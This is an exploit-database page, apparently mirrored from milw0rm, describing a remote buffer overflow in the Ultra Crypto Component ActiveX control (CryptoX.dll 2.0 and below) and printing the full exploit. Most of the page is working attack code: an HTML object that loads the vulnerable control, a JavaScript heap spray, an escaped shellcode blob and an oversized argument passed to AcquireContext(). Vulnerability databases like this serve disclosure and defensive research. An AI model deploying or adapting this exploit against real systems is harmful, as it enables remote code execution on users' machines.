header-logo
Suggest Exploit
vendor:
Ultra Crypto Component
by:
shinnai
9
CVSS
CRITICAL
Buffer Overflow
119
CWE
Product Name: Ultra Crypto Component
Affected Version From: CryptoX.dll version 2.0 and below
Affected Version To: CryptoX.dll version 2.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP Professional SP2 with Internet Explorer 7

Ultra Crypto Component (CryptoX.dll <= 2.0) "AcquireContext()" Remote BoF Exploit

This exploit targets the Ultra Crypto Component (CryptoX.dll) version 2.0 and below. The vulnerability lies in the "AcquireContext()" and "DeleteContext()" functions, which can be exploited to execute arbitrary code remotely. This can lead to a complete compromise of the affected system. The exploit utilizes the Heap Spray Technique developed by SkyLined to increase the chances of successful exploitation. All software that use this OCX are vulnerable to this exploit.

Mitigation:

To mitigate this vulnerability, it is recommended to update the Ultra Crypto Component (CryptoX.dll) to a version higher than 2.0. Additionally, implementing proper input validation and boundary checks in the affected software can help prevent exploitation.
Source

Exploit-DB raw data:

<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------------
 <b>Ultra Crypto Component (CryptoX.dll <= 2.0) "AcquireContext()" Remote BoF Exploit</b>
 url: http://www.ultrashareware.com/

 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org
 
 This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.
 
 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
 all software that use this ocx are vulnerable to this exploits.

 Heap Spray Technique was developed by SkyLined
 (http://www.edup.tudelft.nl/~bjwever/advisory_iframe.html.php)

 <b>The "DeleteContext()" is vulnerable too</b>
-----------------------------------------------------------------------------------
<object id=boom classid="clsid:09C282FE-7DE7-4697-9BE2-1C4F4DA825B3" style="WIDTH: 578px; HEIGHT: 228px"></object>
<input language=JavaScript onclick=tryMe() type=button value="Launch Exploit">
<script>
 var shellcode = unescape( "%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
                           "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
                           "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
                           "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
                           "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
                           "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
                           "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
                           "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
                           "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
                           "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
                           "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
                           "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
                           "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
                           "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
                           "%u652E%u6578%u9000");

 var spraySlide = unescape("%u9090%u9090");
 var heapSprayToAddress = 0x0c0c0c0c;

  function tryMe()
   {
    var size_buff = 3200;
    var x =  unescape("%0c%0c%0c%0c");
    while (x.length<size_buff) x += x;
    x = x.substring(0,size_buff);

    boom.AcquireContext(x,1,1);
   }
    
  function getSpraySlide(spraySlide, spraySlideSize)
   {
    while (spraySlide.length*2<spraySlideSize)
     {
      spraySlide += spraySlide;
     }
    spraySlide = spraySlide.substring(0,spraySlideSize/2);
    return (spraySlide);
   }

 var heapBlockSize = 0x100000;
 var SizeOfHeapDataMoreover = 0x5;
 var payLoadSize = (shellcode.length * 2);

 var spraySlideSize = heapBlockSize - (payLoadSize + SizeOfHeapDataMoreover);
 var heapBlocks = (heapSprayToAddress+heapBlockSize)/heapBlockSize;

 var memory = new Array();
 spraySlide = getSpraySlide(spraySlide,spraySlideSize);

 for (i=0;i<heapBlocks;i++)
  {
    memory[i] = spraySlide +  shellcode;
  }
</script>
</span></span>
</code></pre>

# milw0rm.com [2007-09-10]

Navigation

Suggest Exploit

Services By CQR